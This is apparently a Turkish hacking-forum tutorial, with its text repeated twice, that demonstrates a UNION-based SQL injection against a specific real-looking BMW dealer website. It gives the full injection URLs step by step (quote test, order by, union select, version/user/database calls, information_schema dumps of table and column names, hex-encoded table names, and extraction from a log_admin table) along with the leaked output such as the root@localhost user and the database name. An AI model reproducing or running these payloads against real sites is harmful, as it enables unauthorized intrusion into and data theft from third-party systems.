Arkadaşlar biraz komik anlatmaya çalıştım....Büyük bomba sonunda 
Sql geliştirsin diye baya bi uzun oldu
Sitemiz bu arkadaşlar 'a işleme başlıyalım siteye 'a sonuna eklediğimizde sayfa da eksiklikler meydana geliyor..Yani sql açığı var Ama siteyi ana sayfaya yönlendirseydi bu açık korumalı olucaktı..
Kolon sayısını çekelim..Komutumuz order+by+
daha sonra hangi kolondan admin verilerini çekicemize bakalım komutumuz union+select+
Ekrana yansıyan 2 ve 4 rakamları admin bilgileri ,idleri vb. şeyleri çekeceğimiz rakamlar demektir..
Devam edelim version() user() database() kodlarını bu rakamlara yansıtalım..
Gördüğümüz üzere versionu= 5.1.72
User verisini çekelim = root@localhost
database ismini çekelim
database ismimiz= db_abr
Tablo isimlerini bulmaya geçelim ...Table komutu ile çekiyoruz veriyi..komutumuz from+information_schema.tables+where+table_schema=database()--+
log_admin,ta_admin,ta_admin2,ta_admin3,ta_agentta_aktuell,ta_angebot,ta_antrieb,ta_art,ta_aufbauta_baugruppen,ta_bauuntergruppen,ta_bearbeitungta_city_sub,ta_clicks,ta_dienstleistung,ta_farbeta_format,ta_getriebe,ta_haendlerclicks,ta_heberta_homepage,ta_hsnews,ta_jobs,ta_kfzsuche,ta_klassenta_kunden,ta_land,ta_mode,ta_news,ta_newskat
Tablo isimlerimiz bunlar...
Daha sonra tabloların içine bakalım neler varmış..Column kodu ile bakıyoruz..
id,id_admin,id_user,time,sql,id,ip,id,ip,id,ip,id,vname,name,id,name,kurztext,text,qlink,eingabe,sperre,id_user,id,id_user,bezang,angebot,angpreis,id,name,id,name,id,name,klasse,kategorie,id,name,id,id_baugruppe,name,id,name,id,name,domain,id_region_sub,id,seite,time,id_region,ip,id,dienstleistung,gruppeid,name,name_en,name_ru,id,name,id
Tablolarımızın içinde bu sütunlar varmış
İsterseniz istediğiniz tablonun sütunlarını ekrana yansıta bilirsiniz..
Bunun için komutumuz and+table_name=table adı yada and+table_name=0xtablonun hexlenmiş hali şeklinde..
log_admin verisinin tablolarını bulalım... log_admini hexliyoruz..
log_admin= 6c6f675f61646d696e
ekrana yansıttık ..
id,id_admin,id_user,time,sql
Şimdi en son işlem olarak admin verilerini çekelim..İd falan yazıyor büyük ihtimalle kullanıcı adı ve şifreyi bulamadık..İd zaten sonrası rakam falan oluyor id=1 gibi
0 / Eingabe: .. 15379 0 / Eingabe: .. 3482 0 / Eingabe: .. 15684
Gördüğümüz üzere zaten username,password,user,pass gibi veriler yok yani admin bilgilerini çekemiyoruz Hepsini çektik onu çekemiyoruz
Hex converter sitesi=
İyi günler umarım kafanızı daha fazla karıştırmamışımdır
Sql geliştirsin diye baya bi uzun oldu
Sitemiz bu arkadaşlar 'a işleme başlıyalım siteye 'a sonuna eklediğimizde sayfa da eksiklikler meydana geliyor..Yani sql açığı var
Ama siteyi ana sayfaya yönlendirseydi bu açık korumalı olucaktı..
Kod:
http://www.bmw-graubaum.de/bmw.php?id=661'a
Kod:
http://www.bmw-graubaum.de/bmw.php?id=661+order+by+5--+
Kod:
http://www.bmw-graubaum.de/bmw.php?id=-661+union+select+1,2,3,4,5--+Devam edelim version() user() database() kodlarını bu rakamlara yansıtalım..
Kod:
http://www.bmw-graubaum.de/bmw.php?id=-661+union+select+1,version(),3,user(),5--+User verisini çekelim = root@localhost
database ismini çekelim
Kod:
http://www.bmw-graubaum.de/bmw.php?id=-661+union+select+1,database(),3,4,5--+Tablo isimlerini bulmaya geçelim ...Table komutu ile çekiyoruz veriyi..komutumuz from+information_schema.tables+where+table_schema=database()--+
Kod:
http://www.bmw-graubaum.de/bmw.php?id=-661+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()--+log_admin,ta_admin,ta_admin2,ta_admin3,ta_agentta_aktuell,ta_angebot,ta_antrieb,ta_art,ta_aufbauta_baugruppen,ta_bauuntergruppen,ta_bearbeitungta_city_sub,ta_clicks,ta_dienstleistung,ta_farbeta_format,ta_getriebe,ta_haendlerclicks,ta_heberta_homepage,ta_hsnews,ta_jobs,ta_kfzsuche,ta_klassenta_kunden,ta_land,ta_mode,ta_news,ta_newskat
Tablo isimlerimiz bunlar...
Daha sonra tabloların içine bakalım neler varmış..Column kodu ile bakıyoruz..
Kod:
http://www.bmw-graubaum.de/bmw.php?id=-661+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_schema=database()--+id,id_admin,id_user,time,sql,id,ip,id,ip,id,ip,id,vname,name,id,name,kurztext,text,qlink,eingabe,sperre,id_user,id,id_user,bezang,angebot,angpreis,id,name,id,name,id,name,klasse,kategorie,id,name,id,id_baugruppe,name,id,name,id,name,domain,id_region_sub,id,seite,time,id_region,ip,id,dienstleistung,gruppeid,name,name_en,name_ru,id,name,id
Tablolarımızın içinde bu sütunlar varmış
İsterseniz istediğiniz tablonun sütunlarını ekrana yansıta bilirsiniz..
Bunun için komutumuz and+table_name=table adı yada and+table_name=0xtablonun hexlenmiş hali şeklinde..
log_admin verisinin tablolarını bulalım... log_admini hexliyoruz..
log_admin= 6c6f675f61646d696e
Kod:
http://www.bmw-graubaum.de/bmw.php?id=-661+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_schema=database()+and+table_name=0x6c6f675f61646d696e--+id,id_admin,id_user,time,sql
Şimdi en son işlem olarak admin verilerini çekelim..İd falan yazıyor büyük ihtimalle kullanıcı adı ve şifreyi bulamadık..İd zaten sonrası rakam falan oluyor
id=1 gibi
Kod:
http://www.bmw-graubaum.de/bmw.php?id=-661+union+select+1,id_admin,3,id_user,5+from+log_admin--+Gördüğümüz üzere zaten username,password,user,pass gibi veriler yok yani admin bilgilerini çekemiyoruz
Hepsini çektik onu çekemiyoruz Hex converter sitesi=
Kod:
http://www.swingnote.com/tools/texttohex.php